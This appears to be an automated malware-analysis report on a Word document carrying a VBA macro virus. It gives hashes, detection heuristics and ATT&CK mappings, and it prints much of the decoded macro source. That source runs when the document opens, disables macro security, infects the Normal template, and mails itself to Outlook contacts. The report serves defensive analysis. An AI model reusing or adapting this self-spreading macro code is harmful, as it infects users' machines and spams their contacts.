Win.Trojan.Kallisti-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 929532dd32fa56fe…

MALICIOUS

Office (OLE)

35.5 KB Created: 2002-01-20 14:59:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: 6ed9896f588cad7f63dbec7ca51b0380 SHA-1: 280564308e09285512f9cc82f449f012059d00ca SHA-256: 929532dd32fa56fe47b7a7d4b5ebd88b1a1f641a5318e7c0abe87de470ecfb6f
320 Risk Score

Malware Insights

Win.Trojan.Kallisti-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample contains heavily obfuscated VBA macros designed to execute automatically upon opening the document, as indicated by the 'Document_Open' macro and 'Obfuscated auto-exec VBA loader' heuristic. The script attempts to disable Word's macro security settings and inject its code into the Normal template and the active document, likely to establish persistence and facilitate further infection. ClamAV detections for 'Win.Trojan.Kallisti-1' and 'Win.Worm.Moffas-1' further confirm its malicious nature.

Heuristics 6

  • ClamAV: Win.Trojan.Kallisti-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Kallisti-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5598 bytes
SHA-256: 5a721bf31734b2e59c7343f114f602ed3962f4c0e617a9d2fcb1f6f6e3483d95
Detection
ClamAV: Win.Worm.Moffas-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Energy"
'WMXP.Energy Mail/DOC Virus
WMXP.Energy
Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Private Sub Document_Open()
On Error Resume Next
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") <> 1& Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
NT1 = NT.CodeModule.CountOfLines
AD1 = AD.CodeModule.CountOfLines
Nec = 2
If AD.Name <> "rrlf" Then
If AD1 > 0 Then _
AD.CodeModule.DeleteLines 1, AD1
Set ToInfect = AD
AD.Name = "rrlf"
DoAD = True
End If
If NT.Name <> "rrlf" Then
If NT1 > 0 Then _
NT.CodeModule.DeleteLines 1, NT1
Set ToInfect = NT
NT.Name = "rrlf"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo bye
If DoNT = True Then
Do While AD.CodeModule.Lines(1, 1) = ""
AD.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While AD.CodeModule.Lines(Nec, 1) <> ""
ToInfect.CodeModule.InsertLines Nec, AD.CodeModule.Lines(Nec, 1)
Nec = Nec + 1
Loop
End If
End If
Dim DOutlook, DMapiName, BreakUmOffAS
mmm = Chr(32) + Chr(43) + Chr(32) + Chr(67) + Chr(104) + Chr(114) + Chr(40) + Chr(32) + Chr(55) + Chr(57) + Chr(41) + Chr(32) + Chr(32) + Chr(43) + Chr(32) + Chr(67) + Chr(104) + Chr(114) + Chr(40) + Chr(32) + Chr(49) + Chr(49) + Chr(55) + Chr(41) + Chr(32) + Chr(32) + Chr(43) + Chr(32) + Chr(67) + Chr(104) + Chr(114) + Chr(40) + Chr(32) + Chr(49) + Chr(49) + Chr(54) + Chr(41) + Chr(32) + Chr(32) + Chr(43) + Chr(32) + Chr(67) + Chr(104) + Chr(114) + Chr(40) + Chr(32) + Chr(49) + Chr(48) + Chr(56) + Chr(41) + Chr(32) + Chr(32) + Chr(43) + Chr(32) + Chr(67) + Chr(104) + Chr(114) + Chr(40) + Chr(32) + Chr(49) + Chr(49) + Chr(49) + Chr(41) + Chr(32) + Chr(32) + Chr(43) + Chr(32) + Chr(67) + Chr(104) + Chr(114) + Chr(40) + Chr(32) + Chr(49) + Chr(49) + Chr(49) + Chr(41) + Chr(32) + Chr(32) + Chr(43) + Chr(32) + Chr(67) + Chr(104) + Chr(114) + Chr( _
 40) + Chr(32) + Chr(49) + Chr(48) + Chr(55) + Chr(41) + Chr(32)
Set DOutlook = CreateObject(mmm + ".Application")
Set DMapiName = DOutlook.GetNameSpace("MAPI")
If DOutlook = mmm Then
DMapiName.Logon "profile", "password"
Set mmm = DMapiName.AddressLists
For ik = 1 To mmm.Count
Set ABook = DMapiName.AddressLists(ik)
xxx = 1
Set aa = ABook.AddressEntries
Set BreakUmOffAS = DOutlook.CreateItem(0)
For ij = 1 To aa.Count
Pee = aa(xxx)
BreakUmOffAS.Recipients.Add Pee
xxx = xxx + 1
If xxx > 20 Then nr = aa.Count
Next ij
BreakUmOffAS.Subject = "Hello WinXp User !"
BreakUmOffAS.Body = "Here are a Cool doc. with many New Features inside"
BreakUmOffAS.Attachments.Add ActiveDocument.FullName
BreakUmOffAS.Send
Pee = ""
Next ik
DMapiName.Logoff
End If
If DoAD = True Then
Do While NT.CodeModule.Lines(1, 1) = ""
NT.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NT.CodeModule.Lines(Nec, 1) <> ""
ToInfect.CodeModule.InsertLines Nec, NT.CodeModule.Lines(Nec, 1)
Nec = Nec + 1
Loo
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.